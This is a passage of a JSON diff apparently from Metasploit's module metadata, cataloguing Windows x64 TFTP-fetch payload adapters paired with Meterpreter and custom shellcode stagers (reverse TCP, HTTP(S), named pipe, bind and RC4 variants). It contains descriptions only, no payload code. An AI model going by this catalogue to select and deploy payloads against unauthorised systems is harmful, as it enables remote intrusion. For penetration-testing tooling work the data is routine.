Watters", + "bwatters-r7", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/reverse_https", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/tftp/x64/custom/reverse_named_pipe": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/tftp/x64/custom/reverse_tcp": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/tftp/x64/custom/reverse_tcp_rc4": { + "name": "TFTP Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/custom/reverse_tcp_uuid": { + "name": "TFTP Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/custom/reverse_winhttp": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/tftp/x64/custom/reverse_winhttps": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/tftp/x64/encrypted_shell/reverse_tcp": { + "name": "TFTP Fetch, Windows Command Shell, Encrypted Reverse TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/encrypted_shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/encrypted_shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/encrypted_shell", + "stager_refname": "windows/x64/encrypted_reverse_tcp" + }, + "payload_cmd/windows/tftp/x64/encrypted_shell_reverse_tcp": { + "name": "TFTP Fetch, Windows Encrypted Reverse Shell", + "fullname": "payload/cmd/windows/tftp/x64/encrypted_shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn an encrypted command shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/encrypted_shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/encrypted_shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/exec": { + "name": "TFTP Fetch, Windows x64 Execute Command", + "fullname": "payload/cmd/windows/tftp/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nExecute an arbitrary command (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/exec", + "staged": false + }, + "payload_cmd/windows/tftp/x64/loadlibrary": { + "name": "TFTP Fetch, Windows x64 LoadLibrary Path", + "fullname": "payload/cmd/windows/tftp/x64/loadlibrary", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "scriptjunkie", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nLoad an arbitrary x64 library path", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/loadlibrary", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/loadlibrary", + "staged": false + }, + "payload_cmd/windows/tftp/x64/messagebox": { + "name": "TFTP Fetch, Windows MessageBox x64", + "fullname": "payload/cmd/windows/tftp/x64/messagebox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "pasta " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a dialog via MessageBox using a customizable title, text & icon", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/messagebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/messagebox", + "staged": false + }, + "payload_cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp": { + "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid": { + "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/meterpreter/bind_named_pipe": { + "name": "TFTP Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/tftp/x64/meterpreter/bind_tcp": { + "name": "TFTP Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4": { + "name": "TFTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid": { + "name": "TFTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/meterpreter/reverse_http": { + "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_http", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/tftp/x64/meterpreter/reverse_https": { + "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_https", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/tftp/x64/meterpreter/reverse_named_pipe": { + "name": "TFTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/tftp/x64/meterpreter/reverse_tcp": { + "name": "TFTP Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4": { + "name": "TFTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid": { + "name": "TFTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/meterpreter/reverse_winhttp": { + "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + 